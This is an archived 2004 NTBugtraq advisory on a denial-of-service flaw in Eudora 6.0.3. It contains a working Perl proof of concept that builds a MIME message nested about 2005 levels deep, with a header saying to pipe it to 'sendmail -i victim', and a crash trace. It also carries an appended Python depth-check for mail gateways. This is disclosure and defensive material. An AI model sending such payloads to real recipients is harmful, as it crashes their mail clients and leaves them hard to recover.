Eudora 6.0.3 nested MIME DoS

From: Paul Szabo (psz_at_MATHS.USYD.EDU.AU)
Date: 04/14/04

    Date:         Wed, 14 Apr 2004 13:12:23 +1000
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    Eudora 6.0.3 for Windows will crash if sent a MIME message nested more than
    2000 levels deep. Due to the presence of the [EudoraDir]\spool\*.RCV file,
    users may find it difficult to recover from this DoS situation. Demo below.

    Cheers,

    Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
    School of Mathematics and Statistics University of Sydney 2006 Australia

    #!/usr/bin/perl --

    print "From: me\n";
    print "To: you\n";
    print "Subject: nested multipart test\n";
    print "Mime-Version: 1.0\n";
    print "X-Use: Pipe the output of this script into: sendmail -i victim\n";

    &nest(0);
    print "\n";

    sub nest {
      my ($x) = @_;
      my $b = sprintf("bndry%04d",$x);
      print "Content-Type: multipart/mixed; boundary=\"$b\"\n\n";
      print "--$b\n";
      print "Content-Type: text/plain\n\n";
      print "Level $x\n\n";

    # No problem for 1995, but crash for 2005 deep nesting:
    #
    # (378.1c4): Stack overflow - code c00000fd (first chance)
    # First chance exceptions are reported before any exception handling.
    # This exception may be expected and handled.
    # eax=00000409 ebx=00000001 ecx=00000000 edx=00000001 esi=000338a8 edi=62000000
    # eip=77f862ed esp=00032f10 ebp=000337b0 iopl=0 nv up ei pl nz na pe nc
    # cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010202
    # ntdll!LdrLoadAlternateResourceModule+9:
    # 77f862ed 53 push ebx

      if ($x < 2005) {
        print "--$b\n";
        &nest($x+1);
      }
      print "--$b\n";
      print "Content-Type: text/plain\n\n";
      print "Final $x\n";
      print "--$b--\n\n";
    }
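
A receiving-side check for the condition described above, as an added example that is not part of the original post: it measures multipart nesting depth with an explicit stack so a gateway can reject or quarantine a message before a recursive parser sees it. The names `multipart_depth`, `build_nested` and the `MAX_DEPTH` value are assumptions, and the sample input is constructed.

```python
import re

MAX_DEPTH = 32  # assumed policy cap, far below the ~2000 levels the post reports
_BOUNDARY = re.compile(r'boundary\s*=\s*(?:"([^"]+)"|([^\s;]+))', re.I)

def multipart_depth(raw, limit=MAX_DEPTH):
    """Deepest multipart nesting in raw message text; stops once limit is exceeded.
    An explicit stack of open boundaries replaces recursion, so the check itself stays flat."""
    stack, deepest = [], 0
    in_headers, reading_ctype, ctype = True, False, ""
    for line in raw.splitlines():
        if in_headers:
            if line == "":                        # blank line ends a header block
                m = _BOUNDARY.search(ctype) if ctype.lower().startswith("multipart/") else None
                if m:
                    stack.append(m.group(1) or m.group(2))
                    deepest = max(deepest, len(stack))
                    if deepest > limit:
                        return deepest            # caller rejects or quarantines
                in_headers, ctype = False, ""
            elif line[0] in " \t":                # folded header continuation
                if reading_ctype:
                    ctype += " " + line.strip()
            else:
                name, _, value = line.partition(":")
                reading_ctype = name.strip().lower() == "content-type"
                if reading_ctype:
                    ctype = value.strip()
            continue
        if not line.startswith("--"):
            continue
        delim = line[2:].rstrip()
        for i in range(len(stack) - 1, -1, -1):   # innermost open boundary first
            if delim == stack[i]:                 # next part inside container i
                del stack[i + 1:]
                in_headers, reading_ctype = True, False
                break
            if delim == stack[i] + "--":          # container i is closed
                del stack[i:]
                break
    return deepest

def build_nested(levels):
    """Constructed sample input: `levels` multipart containers, one inside another."""
    out = ["From: a@example.test", "Mime-Version: 1.0"]
    for i in range(levels):
        out += [f'Content-Type: multipart/mixed; boundary="b{i}"', "", f"--b{i}"]
    out += ["Content-Type: text/plain", "", "leaf"] + [f"--b{i}--" for i in reversed(range(levels))]
    return "\n".join(out) + "\n"
```

A return value greater than `limit` means the scan stopped early and the message should not be handed to the mail client's parser.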
